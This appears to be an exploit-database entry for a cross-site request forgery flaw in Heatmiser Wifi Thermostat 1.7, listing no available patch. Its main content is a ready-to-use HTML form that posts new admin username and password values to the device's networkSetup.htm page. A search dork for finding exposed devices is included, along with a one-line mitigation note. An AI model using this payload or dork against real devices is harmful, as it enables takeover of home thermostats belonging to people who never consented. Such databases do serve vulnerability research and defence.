header-logo
Suggest Exploit
vendor:
Wifi Thermostat
by:
sajjadbnd
5.5
CVSS
MEDIUM
Cross-Site Request Forgery
352
CWE
Product Name: Wifi Thermostat
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE:
CPE: a:heatmiser:wifi_thermostat:1.7
Metasploit:
Other Scripts:
Platforms Tested:
2019

Heatmiser Wifi Thermostat 1.7 – Cross-Site Request Forgery

The exploit allows an attacker to change the admin username and password by using a CSRF attack. The attacker can submit a form with the desired username and password values, which will be saved on the target device.

Mitigation:

Implement CSRF protection mechanisms, such as using anti-CSRF tokens or checking the referrer header.
Source

Exploit-DB raw data:

# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery
# Dork: intitle:"Heatmiser Wifi Thermostat" & you can use shodan
# Date: 2019-01-09
# Exploit Author: sajjadbnd
# Vendor Lnk: https://www.heatmiser.com/en/ 
# Product Link: https://www.heatmiser.com/en/wireless-thermostats/
# Tested on: Heatmiser Version 1.7
# CVE: N/A

# [+] CSRF: Change Admin Username and Password

<form method="post" name="config" action="http://target:8083/networkSetup.htm">
Name:<input type="text" name="usnm" maxlength="16" value="s" onchange="textchange()"> 
Password:<input type="password" maxlength="16" style="width:150px;" name="usps" >
Confirm User Password:<input type="password" maxlength="16" style="width:150px;" name="cfps" onchange="textchange()">
<input id="btnSubmit" type="submit" class="sm" value=" Save " onclick="saveclick()">
</form>